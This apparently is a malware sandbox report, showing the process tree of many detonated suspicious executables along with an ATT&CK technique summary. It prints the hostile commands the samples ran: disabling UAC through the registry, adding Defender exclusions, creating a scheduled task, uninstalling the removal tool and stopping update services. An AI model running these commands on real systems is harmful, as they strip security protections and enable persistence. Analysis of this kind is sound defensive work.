C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- Modifies registry key
PID:9840
-
-
-
C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"5⤵PID:8372
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵PID:5836
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7⤵
- Modifies registry key
PID:11112
-
-
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"6⤵PID:8608
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7⤵PID:8384
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f8⤵
- Modifies registry key
PID:9620
-
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe7⤵PID:9916
-
C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"8⤵PID:3492
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f9⤵PID:632
-
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"9⤵PID:3080
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f10⤵PID:5424
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3080 -s 108810⤵
- Program crash
PID:3680
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8608 -s 11927⤵
- Program crash
PID:2932
-
-
-
-
-
C:\Users\Admin\Desktop\a\mcgen.exe"C:\Users\Admin\Desktop\a\mcgen.exe"4⤵PID:10428
-
C:\Users\Admin\Desktop\a\mcgen.exe"C:\Users\Admin\Desktop\a\mcgen.exe"5⤵PID:8188
-
-
-
C:\Users\Admin\Desktop\a\Gorebox%20ModMenu%201.2.0.exe"C:\Users\Admin\Desktop\a\Gorebox%20ModMenu%201.2.0.exe"4⤵PID:1692
-
-
C:\Users\Admin\Desktop\a\mode11_0HVJ.exe"C:\Users\Admin\Desktop\a\mode11_0HVJ.exe"4⤵PID:8028
-
-
C:\Users\Admin\Desktop\a\mode11_AKUh.exe"C:\Users\Admin\Desktop\a\mode11_AKUh.exe"4⤵PID:9384
-
-
C:\Users\Admin\Desktop\a\daytjhasdawd.exe"C:\Users\Admin\Desktop\a\daytjhasdawd.exe"4⤵PID:1624
-
-
C:\Users\Admin\Desktop\a\Java32.exe"C:\Users\Admin\Desktop\a\Java32.exe"4⤵PID:8364
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\a\Java32.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:4780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java32.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:11156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update(32bit).exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:5812
-
-
-
C:\Users\Admin\Desktop\a\XClient.exe"C:\Users\Admin\Desktop\a\XClient.exe"4⤵PID:10896
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\a\XClient.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:3424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:8892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update(32bit).exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:1056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update(32bit).exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:5632
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Java Update(32bit)" /tr "C:\ProgramData\Java Update(32bit).exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:8092
-
-
-
C:\Users\Admin\Desktop\a\AdobePDFReader.exe"C:\Users\Admin\Desktop\a\AdobePDFReader.exe"4⤵PID:4516
-
-
C:\Users\Admin\Desktop\a\Coc%20Coc.exe"C:\Users\Admin\Desktop\a\Coc%20Coc.exe"4⤵PID:6152
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\95B6.tmp\95B7.tmp\95B8.bat C:\Users\Admin\Desktop\a\Coc%20Coc.exe"5⤵PID:2000
-
C:\Users\Admin\AppData\Roaming\portable_util.exeportable_util.exe --register-coccoc-portable --force-uid=3849d47c-687c-49be-b315-4e062899d124 --skip-import --skip-welcome --do-not-create-shortcut --force-regenerate-hid6⤵PID:9048
-
C:\Users\Admin\AppData\Roaming\setup.exe"C:\Users\Admin\AppData\Roaming\setup.exe" --register-coccoc-portable --do-not-create-shortcut7⤵PID:8140
-
C:\Users\Admin\AppData\Roaming\setup.exeC:\Users\Admin\AppData\Roaming\setup.exe --type=crashpad-handler /prefetch:7 --no-upload-gzip --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\CocCoc\Browser\User Data\Crashpad" --url=https://browser-crashes.coccoc.com/cr/report --annotation=channel= --annotation=plat=Win32 "--annotation=prod=Coc Coc" --annotation=ver=114.0.5735.210 --initial-client-data=0x31c,0x320,0x324,0x2f8,0x328,0x908088,0x908098,0x9080a48⤵PID:8660
-
-
-
-
-
-
C:\Users\Admin\Desktop\a\ghjaedjgaw.exe"C:\Users\Admin\Desktop\a\ghjaedjgaw.exe"4⤵PID:6804
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:9512
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:9564
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20240401114208 -prefsHandle 2244 -prefMapHandle 2236 -prefsLen 21257 -prefMapSize 243020 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ebd8528-c7a6-44a0-a1d6-1957e5bf8196} 9564 "\\.\pipe\gecko-crash-server-pipe.9564" gpu4⤵PID:1120
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2676 -parentBuildID 20240401114208 -prefsHandle 2668 -prefMapHandle 2664 -prefsLen 21257 -prefMapSize 243020 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {92582280-973b-4f11-bbf6-4e82fe8aa8fd} 9564 "\\.\pipe\gecko-crash-server-pipe.9564" socket4⤵PID:5056
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3504 -childID 1 -isForBrowser -prefsHandle 3428 -prefMapHandle 3440 -prefsLen 21326 -prefMapSize 243020 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a652ad99-157a-43fb-a8a0-3cb9300af22a} 9564 "\\.\pipe\gecko-crash-server-pipe.9564" tab4⤵PID:6060
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3928 -childID 2 -isForBrowser -prefsHandle 3920 -prefMapHandle 3916 -prefsLen 22177 -prefMapSize 243020 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b2ed0fe-cf2c-4ef5-8a83-6e1f25accaa5} 9564 "\\.\pipe\gecko-crash-server-pipe.9564" tab4⤵PID:5044
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5020 -parentBuildID 20240401114208 -prefsHandle 5096 -prefMapHandle 5056 -prefsLen 30004 -prefMapSize 243020 -appDir "C:\Program Files\Mozilla Firefox\browser" - {319fabbc-98e9-4f91-ab4b-84224b2250f0} 9564 "\\.\pipe\gecko-crash-server-pipe.9564" rdd4⤵PID:10456
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5260 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5276 -prefMapHandle 5292 -prefsLen 33458 -prefMapSize 243020 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39cc7caf-e466-46ac-ac76-f06fe4278887} 9564 "\\.\pipe\gecko-crash-server-pipe.9564" utility4⤵PID:11032
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5304 -childID 3 -isForBrowser -prefsHandle 5428 -prefMapHandle 5424 -prefsLen 28381 -prefMapSize 243020 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {888875eb-6757-4d64-b0dd-476e4df1e56c} 9564 "\\.\pipe\gecko-crash-server-pipe.9564" tab4⤵PID:11132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5636 -childID 4 -isForBrowser -prefsHandle 5624 -prefMapHandle 5628 -prefsLen 28381 -prefMapSize 243020 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {227a09ae-ebd0-4704-8340-6be5c1786e74} 9564 "\\.\pipe\gecko-crash-server-pipe.9564" tab4⤵PID:11160
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5784 -childID 5 -isForBrowser -prefsHandle 5840 -prefMapHandle 5844 -prefsLen 28381 -prefMapSize 243020 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f68f9fda-e24c-48e7-83a9-98ca42f4e38a} 9564 "\\.\pipe\gecko-crash-server-pipe.9564" tab4⤵PID:11172
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3796 -childID 6 -isForBrowser -prefsHandle 5880 -prefMapHandle 6224 -prefsLen 28631 -prefMapSize 243020 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2bcb2935-62de-4455-8207-800d3f141fff} 9564 "\\.\pipe\gecko-crash-server-pipe.9564" tab4⤵PID:7784
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1640 -childID 7 -isForBrowser -prefsHandle 3744 -prefMapHandle 6072 -prefsLen 29701 -prefMapSize 243020 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dad98ed1-9457-415b-a8d1-e023609d3ff5} 9564 "\\.\pipe\gecko-crash-server-pipe.9564" tab4⤵PID:11116
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3068 -childID 8 -isForBrowser -prefsHandle 5664 -prefMapHandle 2020 -prefsLen 29701 -prefMapSize 243020 -jsInitHandle 884 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb3a68b1-d555-49d9-a6ff-e21e29c5fc86} 9564 "\\.\pipe\gecko-crash-server-pipe.9564" tab4⤵PID:7812
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:9992
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:9580
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3568
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3744
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3896
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3372
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4956
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4584
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4860
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3112
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3388
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:3484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:5004
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:2108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:2900
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5332
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:5568
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5860
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:1840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2024 -ip 20242⤵PID:1120
-
-
C:\ProgramData\Screenshots\Lightshot.exeC:\ProgramData\Screenshots\Lightshot.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3804 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:816 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:6148
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2692
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:6172
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:6748
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:6680
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:6620
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:6568
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:6516
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:6504
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:6492
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:6488
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:6472
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:6392
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:5460
-
-
C:\ProgramData\Screenshots\Lightshot.exe"C:\ProgramData\Screenshots\Lightshot.exe"3⤵PID:5100
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:7104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:3496
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:2104
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:5744
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:5188
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:6848
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:6800
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:6172
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:6248
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:2852
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:2732
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:6700
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:6420
-
-
C:\Windows\system32\dialer.exedialer.exe4⤵PID:6864
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:6548
-
-
C:\ProgramData\Screenshots\Lightshot.exe"C:\ProgramData\Screenshots\Lightshot.exe"3⤵PID:3804
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:6616
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:3076
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:4196
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:736
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:2524
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:1160
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:5676
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:5668
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:4544
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:4872
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:5796
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:4392
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:3884
-
-
C:\Windows\system32\dialer.exedialer.exe4⤵PID:4056
-
-
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:6868
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:5868
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4928 -ip 49281⤵PID:8352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 8296 -ip 82961⤵PID:3460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 8936 -ip 89361⤵PID:7704
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:9644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 240 -p 8500 -ip 85001⤵PID:9548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 8124 -ip 81241⤵PID:4568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 9332 -ip 93321⤵PID:4432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 9548 -ip 95481⤵PID:7412
-
C:\ProgramData\Screenshots\Lightshot.exeC:\ProgramData\Screenshots\Lightshot.exe1⤵PID:2892
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:9996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:10032
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1276
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4340
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2856
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:10828
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1248
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:7340
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:8504
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:3972
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:10412
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:11060
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:6056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 10936 -ip 109361⤵PID:6816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10936 -ip 109361⤵PID:1160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 9204 -ip 92041⤵PID:4240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 8608 -ip 86081⤵PID:5640
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
2Disable or Modify System Firewall
1Indicator Removal
2Clear Windows Event Logs
1File Deletion
1Modify Registry
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Discovery
Browser Information Discovery
1Network Service Discovery
1Query Registry
5Remote System Discovery
1System Information Discovery
4System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\update-config.json
Filesize102B
MD57d1d7e1db5d8d862de24415d9ec9aca4
SHA1f4cdc5511c299005e775dc602e611b9c67a97c78
SHA256ffad3b0fb11fc38ea243bf3f73e27a6034860709b39bf251ef3eca53d4c3afda
